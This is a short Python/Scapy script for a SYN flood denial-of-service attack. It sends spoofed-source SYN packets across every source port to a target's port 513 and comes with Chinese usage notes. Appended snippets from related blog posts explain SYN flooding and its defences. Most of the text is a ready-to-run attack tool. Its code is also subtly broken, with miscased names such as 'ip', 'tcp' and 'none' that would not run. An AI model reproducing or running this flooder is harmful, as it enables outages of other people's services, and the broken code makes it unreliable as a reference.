#!/usr/bin/python
#coding=utf-8
from scapy.all import *
import optparse
def synflood(src, tgt):
# tcp源埠不斷自增一,而目標埠513不變
for sport in range(1024, 65535):
iplayer = ip(src=src, dst=tgt)
tcplayer = tcp(sport=sport, dport=513)
pkt = iplayer / tcplayer
send(pkt)
def main():
parser = optparse.optionparser('[*] usage : ./synattack.py -s -t ')
parser.add_option('-s',dest='src',type='string',help='specify scr address')
parser.add_option('-t',dest='tgt',type='string',help='target address')
(options,args) = parser.parse_args()
if (options.src == none) | (options.tgt == none):
print parser.usage
exit(0)
src = options.src
tgt = options.tgt
synflood(src, tgt)
if __name__ == '__main__':
main()
使用scapy製造一些再有tcp協議層的ip資料報,讓這些包tcp源埠不斷地自增一,而目的tcp埠513不變。
先確認目標主機開啟了513埠,然後進行syn洪氾攻擊:
syn泛洪 過濾 SYN泛洪攻擊原理及防禦
拒絕服務攻擊時,攻擊者想非法占用被攻擊者的一些資源,比如如 頻寬,cpu,記憶體等等,使得被攻擊者無法響應正常使用者的請求。講泛洪攻擊之前,我們先了解一下dos攻擊和ddos攻擊,這兩個攻擊大體相同,前者的意思是 拒絕服務攻擊 後者的意思是 分布式拒絕服務攻擊。不要看這兩個攻擊前乙個比後乙個多了乙個...
SYN 洪氾攻擊以及如何解決SYN 洪氾攻擊
在三次握手的過程中,伺服器為了響應乙個受到的syn報文段,會分配並初始化連線變數和快取,然後伺服器傳送乙個synack報文段進行響應,並等待客戶端的ack報文段。如果客戶不傳送ack來完成該三次握手的第三步,最終 通常在一分多鐘之後 伺服器將終止該半開連線並 資源。這種tcp連線管理協議的特性就會有...
Python實施SYN泛洪攻擊
python的安裝我就不再 懶 贅 得 述 寫 了,為了方便和速度,我們用清華源安裝scapy 這裡用python2和python3都可以,我編寫的指令碼相容了兩個版本 pip install i scapy等待一下,基本上就安裝好了,如果報錯,那你就執行pip install pip upgrad...